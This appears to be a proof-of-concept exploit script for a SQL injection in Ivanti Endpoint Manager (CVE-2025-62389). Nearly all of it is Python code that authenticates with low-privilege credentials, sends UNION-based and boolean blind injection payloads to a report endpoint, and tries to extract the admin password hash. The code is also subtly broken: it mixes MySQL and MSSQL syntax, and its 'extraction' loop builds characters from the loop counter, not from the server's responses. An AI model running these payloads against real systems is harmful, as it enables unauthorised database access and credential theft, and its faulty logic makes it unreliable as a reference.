CVE-2025-62389 Ivanti Endpoint Manager SQL注入漏洞

# CVE-2025-62389 - Ivanti Endpoint Manager SQL Injection PoC # Vulnerability: SQL Injection in Ivanti Endpoint Manager before 2024 SU5 # Attack Vector: Remote authenticated attacker can read arbitrary data from the database import requests import sys TARGET_URL = "https://target-ivanti-epm.com" USERNAME = "low_privilege_user" PASSWORD = "password123" # Step 1: Authenticate to obtain a valid session session = requests.Session() login_url = f"{TARGET_URL}/api/auth/login" login_payload = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_payload, verify=False) if response.status_code != 200: print("[-] Authentication failed") sys.exit(1) print("[+] Authenticated successfully") # Step 2: Exploit SQL Injection via vulnerable parameter # The vulnerable endpoint accepts user-supplied input without proper sanitization vuln_url = f"{TARGET_URL}/api/reports/generate" # UNION-based SQL Injection payload to extract database version sql_payload = { "reportId": "1", "filter": "1' UNION SELECT @@version, user(), database()-- -" } response = session.post(vuln_url, json=sql_payload, verify=False) if response.status_code == 200: print("[+] SQL Injection successful!") print(f"[+] Database info: {response.text}") else: print("[-] Exploit failed") # Step 3: Boolean-based blind SQL Injection to extract sensitive data # Extract admin password hash character by character extracted_hash = "" for i in range(1, 33): blind_payload = { "reportId": "1", "filter": f"1' AND ASCII(SUBSTRING((SELECT TOP 1 password_hash FROM users WHERE role='admin'),{i},1))>64-- -" } response = session.post(vuln_url, json=blind_payload, verify=False) if "results" in response.text and len(response.json().get("results", [])) > 0: extracted_hash += chr(64 + (i % 26) + 1) # Simplified extraction logic print(f"[+] Extracted admin hash: {extracted_hash}")